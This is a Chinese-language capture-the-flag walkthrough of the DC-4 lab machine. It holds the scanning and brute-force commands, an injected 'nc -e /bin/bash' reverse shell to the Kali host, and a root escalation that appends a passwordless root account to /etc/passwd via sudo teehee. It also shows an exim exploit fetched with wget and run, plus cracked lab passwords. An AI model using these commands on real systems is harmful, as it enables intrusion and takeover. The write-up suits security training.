DC-4渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.151)
**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.151
whatweb 192.168.229.151
dirsearch -u 192.168.229.151 -e * -x 403,404
发现可用的信息很少,几乎没有,尝试直接爆破
**二.暴力破解**
这里就猜用户名为admin 字典用弱口令top1000 用burpsuite爆破出来密码是happy,登录进去看发现可用执行命令,抓个包来看看可以执行其他命令吗,发现可以执行一些查看类的命令
**三.反弹shell**
通过尝试发现不能用echo写入木马,bash也反弹不了,nc能用,这尝试用nc反弹shell
在kali上:
nc -vlp 8888
用burp抓包,radio=nc -e /bin/bash 192.168.229.132 8888
kali上连接到一个虚拟shell
python -c 'import pty;pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null //查看哪些有suid权限发现没有可用的
sudo -l //没有权限
cat /etc/passwd //sudo,suid,msf,searchsploit都没有发现可以利用的,则尝试从用户入手
cd /home //去家目录下寻找线索发现只有jim能查看里面的信息,mbox还看不了,里面有一个旧密码的备份文件,复制到test文件尝试爆破
hydra -l jim -P test 192.168.229.151 ssh //爆破出来密码jibril04
**四.提权**
ssh jim@192.168.229.151
cat mbox //查看刚才看不了的文件提示我们要去看邮件
cd /var/spool/mail
ls
cat jim //发现里面有charles的密码,^xHhA&hvim0y
ssh charles@192.168.229.151
sudo -l //查看哪些能以root身份执行,发现teehee,利用它提权
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su test //获得root权限
cd /root
ls
cat flag.txt
这里还有另一种解法,利用exim的提取漏洞
因为在检测SUID文件的时候看到了有exim(前提是知道exim有提权漏洞)
exim --version //4.89
searchsploit exim //重新开一个终端搜索漏洞,发现有提权漏洞
locate linux/local/46996.sh
cp /usr/share/exploitdb/exploits/linux/local/46996.sh test.sh
python3 -m http.server //开启的是8000端口
回到虚拟shell
wget http://192.168.229.132:/8000/test.sh //发现没有写入权限,则cd到 /tmp 文件中,在/tmp目录下任何人都有写权限
cd /tmp
wget http://192.168.229.132:/8000/test.sh
chmod 777 test.sh //给test.sh文件赋权
./test.sh //得到root权限